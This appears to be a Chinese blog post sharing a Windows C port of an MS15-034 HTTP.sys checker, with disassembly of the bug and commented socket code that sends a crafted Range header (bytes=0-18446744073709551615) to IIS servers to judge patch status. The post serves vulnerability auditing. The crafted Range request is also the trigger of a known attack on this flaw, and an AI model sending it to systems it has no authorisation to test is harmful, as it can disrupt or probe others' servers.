  • HTTP.sys 远程执行代码验证工具

    漏洞信息:

      远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。这里将测试工具改成windows版本方便工作。

    代码:

    /*
     UNTESTED - MS15-034 Checker
      
     THE BUG:
    
        8a8b2112 56              push    esi
        8a8b2113 6a00            push    0
        8a8b2115 2bc7            sub     eax,edi
        8a8b2117 6a01            push    1
        8a8b2119 1bca            sbb     ecx,edx
        8a8b211b 51              push    ecx
        8a8b211c 50              push    eax
        8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
    */
    
    #define WIN32_LEAN_AND_MEAN 
    #include <windows.h>
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <winsock2.h> 
    #include <Ws2tcpip.h>
    
    #pragma  comment(lib,"ws2_32.lib")
    
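    /*
     * Open a TCP connection to ip:port.
     *
     * ip   - IPv4 address in dotted-quad form (resolved with inet_pton, so a
     *        host name is rejected, not looked up).
     * port - TCP port, 1..65535.
     *
     * Returns the connected socket, narrowed to int, on success. Returns -1
     * on every failure after printing a diagnostic; the original returned 0
     * or 1 on some failures and called exit() on others, and 0/1 cannot be
     * told apart from a real descriptor by the caller.
     *
     * WSAStartup is called on each invocation. Winsock reference-counts it,
     * so a successful call leaves one reference that the caller releases
     * with WSACleanup once it has closed the socket; failure paths release
     * their own reference here.
     */
    int connect_to_server(char *ip, const int port)
    {
        WSADATA wsadata;
        SOCKET sockfd = INVALID_SOCKET;
        struct sockaddr_in serv_addr;
    
        /* htons() below would silently truncate anything outside this range. */
        if (port <= 0 || port > 65535)
        {
            printf("\n Error : Invalid port %d\n", port);
            return -1;
        }
    
        if (WSAStartup(MAKEWORD(2, 0), &wsadata) != 0)
        {
            printf("\n Error : WSAStartup failed\n");
            return -1;
        }
    
        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        if (sockfd == INVALID_SOCKET)
        {
            printf("\n Error : Could not create socket %d\n", WSAGetLastError());
            goto fail_cleanup;
        }
    
        /* Zero the whole struct (the original used '0', i.e. 0x30, which
           left sin_zero filled with ASCII digits). */
        memset(&serv_addr, 0, sizeof serv_addr);
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_port = htons((unsigned short)port);
    
        /* inet_pton returns 1 on success, 0 for an unparsable address and -1
           on error; both non-1 outcomes are failures here. */
        if (inet_pton(AF_INET, ip, &serv_addr.sin_addr) <= 0)
        {
            printf("\n inet_pton error occured\n");
            goto fail_close;
        }
    
        if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof serv_addr) == SOCKET_ERROR)
        {
            printf("\n Error : Connect Failed \n");
            goto fail_close;
        }
    
        return (int)sockfd;
    
    fail_close:
        /* The original leaked the descriptor on these paths. */
        closesocket(sockfd);
    fail_cleanup:
        WSACleanup();
        return -1;
    }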
        
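    /*
     * Send one request to ip:port and capture the first segment of the reply
     * into buf, which is always NUL-terminated on return (the original never
     * terminated recvBuff and ran strstr() over whatever was in it, even
     * when recv() had failed).
     *
     * Returns the number of bytes received (0 if the peer closed without
     * sending anything), or -1 if connecting, sending or receiving failed.
     * The socket is closed and the Winsock reference taken by
     * connect_to_server released on every path.
     *
     * Only the first recv() is read; the status line and headers this tool
     * inspects are expected to arrive in that segment, and looping would
     * block on a keep-alive connection.
     */
    static int probe(char *ip, int port, const char *req, char *buf, size_t cap)
    {
        int rc = -1;
        int n = 0;
        size_t sent = 0;
        size_t len = strlen(req);
        int sockfd = connect_to_server(ip, port);
    
        if (sockfd < 0 || cap == 0)
        {
            return -1;
        }
        buf[0] = '\0';
    
        /* send() may accept fewer bytes than requested. */
        while (sent < len)
        {
            n = send((SOCKET)sockfd, req + sent, (int)(len - sent), 0);
            if (n == SOCKET_ERROR || n <= 0)
            {
                goto out;
            }
            sent += (size_t)n;
        }
    
        n = recv((SOCKET)sockfd, buf, (int)(cap - 1), 0);
        if (n == SOCKET_ERROR || n < 0)
        {
            goto out;
        }
        buf[n] = '\0';
        rc = n;
    
    out:
        closesocket((SOCKET)sockfd);
        WSACleanup();
        return rc;
    }
    
    /*
     * MS15-034 patch-status check.
     *
     * argv[1] is the server's IPv4 address, argv[2] its TCP port. A plain
     * HTTP/1.0 request is sent first and the reply must mention "Microsoft"
     * (the Server header) for the audit to continue. The second request
     * carries a Range header whose upper bound is 2^64-1; the reply text
     * decides the verdict: "Requested Range Not Satisfiable" is reported as
     * vulnerable, "The request has an invalid header name" as patched,
     * anything else as undetermined.
     *
     * Exit status keeps the original's convention: 1 for usage errors, a
     * non-IIS target, a failed probe, or a target that looks vulnerable;
     * 0 when the target looks patched or the result is undetermined.
     */
    int main(int argc, char *argv[])
    {
        char recvBuff[1024];
        char *end = NULL;
        long port = 0;
    
        /* Server-identification request; HTTP/1.0 so the peer closes after
           replying. HTTP requires CRLF line endings. */
        char request[] = "GET / HTTP/1.0\r\n\r\n";
        /* The MS15-034 detection request. */
        char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
    
        if (argc != 3)
        {
            printf("\n Usage: %s <ip of server> <port of server> \n", argv[0]);
            return 1;
        }
    
        /* strtol instead of atoi: reject trailing junk and out-of-range ports
           up front rather than letting htons() truncate them. */
        port = strtol(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || port <= 0 || port > 65535)
        {
            printf("\n Error : Invalid port '%s'\n", argv[2]);
            return 1;
        }
    
        printf("[*] Audit Started\n");
    
        if (probe(argv[1], (int)port, request, recvBuff, sizeof recvBuff) < 0)
        {
            printf("[*] Could not query server\n");
            return 1;
        }
    
        if (!strstr(recvBuff, "Microsoft"))
        {
            printf("[*] NOT IIS\n");
            return 1;
        }
    
        if (probe(argv[1], (int)port, request1, recvBuff, sizeof recvBuff) < 0)
        {
            printf("[*] Could not query server\n");
            return 1;
        }
    
        if (strstr(recvBuff, "Requested Range Not Satisfiable"))
        {
            printf("[!!] Looks VULN\n");
            return 1;
        }
        else if (strstr(recvBuff, "The request has an invalid header name"))
        {
            printf("[*] Looks Patched");
        }
        else
        {
            printf("[*] Unexpected response, cannot discern patch status");
        }
    
        return 0;
    }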

    测试截图:

      
